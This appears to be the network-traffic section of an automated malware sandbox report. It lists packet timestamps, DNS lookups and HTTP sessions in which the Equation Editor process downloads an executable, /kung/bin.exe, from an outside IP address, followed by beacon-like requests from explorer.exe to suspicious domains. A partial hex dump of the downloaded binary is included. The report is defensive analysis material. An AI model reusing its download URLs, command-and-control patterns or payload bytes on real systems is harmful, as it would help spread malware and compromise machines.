                                                                                                                                                  Jul 22, 2021 17:11:04.809457064 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809464931 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809479952 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809495926 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809500933 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809525967 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809544086 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809549093 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809551954 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809570074 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809583902 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809592962 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809614897 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809616089 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809634924 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809643030 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809658051 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809672117 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809679985 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809704065 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809704065 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809726954 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809731007 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809746981 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809757948 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809768915 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809791088 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809791088 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809812069 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809825897 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809834003 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809851885 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809854031 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.809883118 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.809911966 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.812660933 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812690020 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812711954 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812735081 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812794924 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812819004 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812839985 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812860966 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.812875032 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.812899113 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.812901974 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.812906027 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813261986 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813308001 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813339949 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813345909 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813371897 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813386917 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813389063 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813412905 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813431978 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813455105 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813462973 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813478947 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813493013 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813500881 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813524008 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813524961 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813546896 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813553095 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813574076 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813577890 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813597918 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813606977 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813621044 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813633919 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813642979 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813664913 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.813667059 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813694000 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.813719988 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.818417072 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818447113 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818473101 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818495035 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818511009 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818540096 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818609953 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.818629980 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.818713903 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818732023 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818794966 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.818826914 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.818880081 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.831667900 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.833298922 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:05.484102011 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:12:26.838511944 CEST4916880192.168.2.2234.102.136.180
                                                                                                                                                  Jul 22, 2021 17:12:26.880671024 CEST804916834.102.136.180192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:26.880809069 CEST4916880192.168.2.2234.102.136.180
                                                                                                                                                  Jul 22, 2021 17:12:26.881021023 CEST4916880192.168.2.2234.102.136.180
                                                                                                                                                  Jul 22, 2021 17:12:26.922955990 CEST804916834.102.136.180192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:27.021441936 CEST804916834.102.136.180192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:27.021476984 CEST804916834.102.136.180192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:27.021775007 CEST4916880192.168.2.2234.102.136.180
                                                                                                                                                  Jul 22, 2021 17:12:27.021811962 CEST4916880192.168.2.2234.102.136.180
                                                                                                                                                  Jul 22, 2021 17:12:27.331846952 CEST4916880192.168.2.2234.102.136.180
                                                                                                                                                  Jul 22, 2021 17:12:27.373899937 CEST804916834.102.136.180192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.291714907 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.416841030 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.417031050 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.417220116 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.541697025 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543577909 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543642044 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543684959 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543699980 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543711901 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543951988 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.543973923 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.543977976 CEST4916980192.168.2.22199.59.242.153

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:12:26.765960932 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:26.827300072 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:37.045444965 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:37.119473934 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.149930000 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:42.290482044 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:47.553082943 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:47.622333050 CEST53612008.8.8.8192.168.2.22

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jul 22, 2021 17:12:26.765960932 CEST192.168.2.228.8.8.80xccffStandard query (0)www.thinking-diversity.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:37.045444965 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.compareionizers.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:42.149930000 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.globaltradeview.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:47.553082943 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.legifo.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jul 22, 2021 17:12:26.827300072 CEST8.8.8.8192.168.2.220xccffNo error (0)www.thinking-diversity.comthinking-diversity.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:26.827300072 CEST8.8.8.8192.168.2.220xccffNo error (0)thinking-diversity.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:37.119473934 CEST8.8.8.8192.168.2.220x2e78Server failure (2)www.compareionizers.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:42.290482044 CEST8.8.8.8192.168.2.220x2f03No error (0)www.globaltradeview.com199.59.242.153A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:47.622333050 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.legifo.com52.58.78.16A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 103.155.80.130
                                                                                                                                                  • www.thinking-diversity.com
                                                                                                                                                  • www.globaltradeview.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.2249167103.155.80.13080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:11:01.858670950 CEST0OUTGET /kung/bin.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 103.155.80.130
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jul 22, 2021 17:11:02.188283920 CEST1INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:11:11 GMT
                                                                                                                                                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
                                                                                                                                                  Last-Modified: Wed, 21 Jul 2021 22:09:30 GMT
                                                                                                                                                  ETag: "b0200-5c7a96cb69dfd"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 721408
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 97 f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f6 0a 00 00 0a 00 00 00 00 00 00 8e 14 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 0b 00 4f 00 00 00 00 20 0b 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f4 0a 00 00 20 00 00 00 f6 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 06 00 00 00 20 0b 00 00 08 00 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 58 ed 09 00 e4 26 01 00 03 00 00 00 e0 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 4f 11 7a bb aa 11 a4 54 af 14 0e 18 4e 1f b2 7e 2f e0 d0 10 2d e5 ba c2 08 75 c0 0a 4a 46 84 79 3f ae ef 45 5c d5 21 7f 3c f3 5f 91 c7 cb 7c 12 64 49 a9 c0 36 fc 99 f9 13 da 5c 84 10 3c a7 e6 19 6a fb 99 18 14 cc 0d 06 39 d0 cd d3 a7 8d 23 60 04 c4 87 55 cd 45 8f 04 06 13 83 62 f5 c3 bd 16 98 84 e2 ca c1 75 a7 90 70 a0 88 07 46 89 2b d3 ea 6c 71 cd f2 29 84 45 3d 6d 15 9e c0 c6 32 ce 18 e9 6d 8f 27 b8 38 2f 1a 64 6b b2 9f af c4 ac ea 15 f7 59 d1 4a 15 66 98 cc 6c 90 9b b9 68 d6 4e c0 76 b3 39 42 b6 2a da b8 a5 e2 99 f5 8e 8d 80 92 86 35 25 ee 6b 4f 55 41 4b a5 02 fb 0a 84 1d 8d 5e 0b ee e4 63 30 56 07 11 9a 30 85 44 e5 e8 1f f2 b5 d7 97 9a 83 b4 f4 99 e7 f5 1e 9b f2 f9 18 03 8a 1e e9 0e d1 53 e8 b8 c4 e6 1d 90 a1 f4 94 6b 31 ce 15 63 5f be 27 54 91 c9 7a 69 3a 8c ca fe 15 cd 42 ff 17 72 ff 2a 76 96 63 a1 4e 14 72 11 50 e4 fd 6f fe 17 f5 7b 8a ac c5 12 28 0b b2 f9 4d ee 33 c1 05 30 7c e2 6b 1f 7d 34 e3 eb 4b 69 ef c4 23 1e 79 d3 2b 54 31 55 89 11 7e 8a 0d 94 13 06 0a 2f cc 81 9b ca 8a 2e 8c fe 7b 91 de 5a 11 ec 21 6c 27 d0 3e e7 84 45 9d 45 7a 4c c0 80 51 aa 3d 37 e2 a1 c6 db 8c a7 58 94 50 ee 8f 71 66 74 81 00 af 08 d5 31 d9 25 3e dc 07 f6 8b 5e f3 05 5b 63 28 0b 10 f5 e4 0a 29 01 1f 73 9a 30 8f 18 c8 e3 b4 96 64 05 8f aa 19
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5`P @ `@<O X@ H.text `.rsrcX @@.reloc@@BpHX&OzTN~/-uJFy?E\!<_|dI6\<j9#`UEbupF+lq)E=m2m'8/dkYJflhNv9B*5%kOUAK^c0V0DSk1c_'Tzi:Br*vcNrPo{(M30|k}4Ki#y+T1U~/.{Z!l'>EEzLQ=7XPqft1%>^[c()s0d
                                                                                                                                                  Jul 22, 2021 17:11:02.188322067 CEST3INData Raw: 91 b9 f6 59 88 60 d7 79 e9 87 2f 3e ad ca 0f f3 0e e8 55 58 3b a9 a5 8a d7 72 15 bc f8 39 20 5d ed dc bb 8c 60 dd b6 16 d8 b0 9c be 67 4b 21 7d c3 89 56 c9 6a a0 eb e9 3c 0e 2f 50 c2 a9 17 c0 ad 55 c2 a8 24 44 35 b8 79 f6 89 5c 1d 6d c1 f8 c3 91
                                                                                                                                                  Data Ascii: Y`y/>UX;r9 ]`gK!}Vj</PU$D5y\mR< M"1sJ}*O_d'*eW,UrFexDakg$yw>UjX]E,EK>4VD^OY1^m
                                                                                                                                                  Jul 22, 2021 17:11:02.188349009 CEST4INData Raw: c0 c7 83 d9 57 e3 85 d2 dd 71 85 95 86 07 4b 4f f0 da 07 bf 14 8b 02 05 dc bc 19 c6 d7 76 b2 df ad d1 76 5b 74 46 9f 92 6d ca 8d e3 ca 9e cb ab 7b 2f ec ae e1 a0 37 bd 85 65 68 d6 a1 a8 1f 0d c0 c7 83 d9 57 e3 85 d2 dd 71 85 95 86 07 4b 4f f0 da
                                                                                                                                                  Data Ascii: WqKOvv[tFm{/7ehWqKOvv[tFf^X0J>H?y\4U:OA+:7hL0'\PgM6|^`8:AOnv-Yz!kJo8n]=Kd08}3w$3,hGGj9r^O
                                                                                                                                                  Jul 22, 2021 17:11:02.188378096 CEST5INData Raw: 28 23 9a cf 9b e8 89 99 a0 ea 60 97 2c 72 af b0 8e 3a b6 e5 97 f7 1e 7b 28 c1 59 0c 46 e8 45 20 fb 98 08 45 d7 1c dc 7e b1 1e 20 70 21 b1 97 8a 67 d1 b1 11 f1 6d c7 ad ba 90 67 35 d7 f4 a0 6c 0e 1c 5b 59 3c 96 bc a4 97 3b 23 ef d6 83 b9 6b de e9
                                                                                                                                                  Data Ascii: (#`,r:{(YFE E~ p!gmg5l[Y<;#kglX2OIO?"iLUX@e7GV]Y!wNla7ESni2N%KDt{OoG\XKph@QJXMxj8!0n]f:N
                                                                                                                                                  Jul 22, 2021 17:11:02.514086962 CEST7INData Raw: f9 4e 96 91 77 d9 a5 58 83 6b b6 a4 25 5c 39 0f a2 ff b6 aa 84 30 e4 fb 76 08 5c 37 39 e5 08 ac 06 f3 37 45 d4 c1 d9 8c 95 82 21 06 26 2f 48 3a f6 33 10 42 fa 24 1c 9d 66 c5 3a 2b 27 02 b2 79 fa a5 de cc c3 5a 2b 53 f4 98 f3 12 14 a7 82 00 22 a1
                                                                                                                                                  Data Ascii: NwXk%\90v\797E!&/H:3B$f:+'yZ+S"K82a]lO(sP^?9`W>'~"G&#;BZBMxxyQ^hW:alGX^1>PaY`,m%La<sI*w.T_
                                                                                                                                                  Jul 22, 2021 17:11:02.515700102 CEST8INData Raw: 41 2d 76 b9 fd 4c d0 76 11 8a 3a 74 7d 78 40 79 54 12 7a c3 ba 01 6d 34 b4 49 59 a8 73 20 43 56 c7 ab 32 36 d2 a9 ce de b5 2d 02 43 4a a6 0d c3 27 ed 0f b6 3e 10 c3 d5 7d 8a 10 2a f3 03 fa f5 81 b1 4e 8d 2b 1a 6e 6a cb e9 07 06 94 0a 97 20 77 d8
                                                                                                                                                  Data Ascii: A-vLv:t}x@yTzm4IYs CV26-CJ'>}*N+nj wo/7pxS^y%R&4SUE1dw/gz72iOa>8V?aDv_x {y~&5c{]z^#r@n([o?j53zoT8`7k
                                                                                                                                                  Jul 22, 2021 17:11:02.515753031 CEST10INData Raw: ee 44 49 ed cb 9c 45 03 45 9d 1c 17 58 f0 a9 c4 d5 2f 99 1b 95 f8 83 c6 27 f0 8a 60 bf 8c 1b 41 de d9 23 5a a1 9f 43 59 43 f6 48 07 fd e1 e0 0b 2a 85 06 88 de a4 9c 8e d6 7c af 95 28 f1 82 3e e9 97 a6 6f b7 84 38 68 3e e5 78 4d fb ab f5 0b 6a b4
                                                                                                                                                  Data Ascii: DIEEX/'`A#ZCYCH*|(>o8h>xMjHDz^EUVz{10@_CK^7QAlv']";}C-*L]49O!"^h0YCTNE;_9PI/8UH9f='$Iop|v#
                                                                                                                                                  Jul 22, 2021 17:11:02.515809059 CEST11INData Raw: 76 fc 06 e7 b0 cd d9 e5 1d 33 a1 20 9a 1c 3f 9c e3 9b 0e 84 f9 2a d5 a9 a3 59 e1 4c 71 52 7c a4 4f bc d6 43 ca 1a cb 69 ae 2f 6d 95 55 a0 8a ff 24 89 d8 bf b0 32 7f a0 b0 db b8 69 8f 69 53 db b8 61 2c a2 a6 60 dc 5f 69 8b 4e 81 d4 c2 8e d8 2b b1
                                                                                                                                                  Data Ascii: v3 ?*YLqR|OCi/mU$2iiSa,`_iN+Uy0%<.3APUgxK2Qq'jO:5=_h-\JdaIOqNMS38W9B%#i5j!-<LLQZ B7*U,&lq!`
                                                                                                                                                  Jul 22, 2021 17:11:02.517229080 CEST12INData Raw: 9a 21 85 86 3a 82 4f 6a d0 27 e3 37 2e 7f 10 24 6c 9f 6f fa 5c 3d e7 fe 3a 88 73 b7 5d 6e 3e 23 94 d2 cc 53 ac af 6f 2f de bc 68 55 d2 dd 49 b1 2f 9d f9 72 3a 04 e2 30 5e 7b c4 56 7b cb ca 0a 86 fa b0 90 6e f5 7c 1e 25 4a 29 2c 05 44 33 cb e3 19
                                                                                                                                                  Data Ascii: !:Oj'7.$lo\=:s]n>#So/hUI/r:0^{V{n|%J),D3W;Kp/,FaOAY{#^w) c<M~$t`5_Z3GP:bG4=@5E[4*2f.o$[5 .mdI;_RpEy
                                                                                                                                                  Jul 22, 2021 17:11:02.517246008 CEST14INData Raw: 71 ec bc 27 70 e2 95 1d da 24 4e 3b 47 8a b2 13 2c 13 c2 f1 8c 0f cc 7b ed 08 bc d0 e1 f5 6f 8f 9c c5 99 7a f7 d6 65 ea 56 6d 43 72 24 e2 46 8e 7f 6c fe cb 7e 55 f8 8c 9b 09 91 3a 19 2c a2 eb 4d f4 aa 6d 32 58 14 02 b0 d0 fb c2 ad ab 3c 2e 39 3b
                                                                                                                                                  Data Ascii: q'p$N;G,{ozeVmCr$Fl~U:,Mm2X<.9;CqO<s=X]^U7Yj9/Hwh^]sXS;rOk]t9B/iEP/6y|~Z/^JkZ"dAv*>-Ub{d&
                                                                                                                                                  Jul 22, 2021 17:11:02.517287970 CEST15INData Raw: 8b fa 38 03 77 2e 7e b1 d8 b9 19 a2 fe 40 04 67 5d 8c 12 1d 26 f6 3d ca f6 33 1e 53 d7 ab 51 5f 72 d0 7f 61 5e 02 57 87 ca ef a5 e2 07 c5 4e 2a e9 be 40 08 ef b9 96 d0 de bc 24 a4 fd f4 87 a2 c4 14 71 b9 42 44 7c 38 45 91 b1 66 e4 9a 8d 7d f9 b5
                                                                                                                                                  Data Ascii: 8w.~@g]&=3SQ_ra^WN*@$qBD|8Ef}bS6H>lFjED[q0X9eOm*]fQ.ddI";_k~js>CFc%n,$l|zL)PfD;$T>a984w:0kB+vD_L


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:12:26.881021023 CEST761OUTGET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1
                                                                                                                                                  Host: www.thinking-diversity.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:12:27.021441936 CEST762INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:12:26 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 275
                                                                                                                                                  ETag: "60ef677e-113"
                                                                                                                                                  Via: 1.1 google
                                                                                                                                                  Connection: close
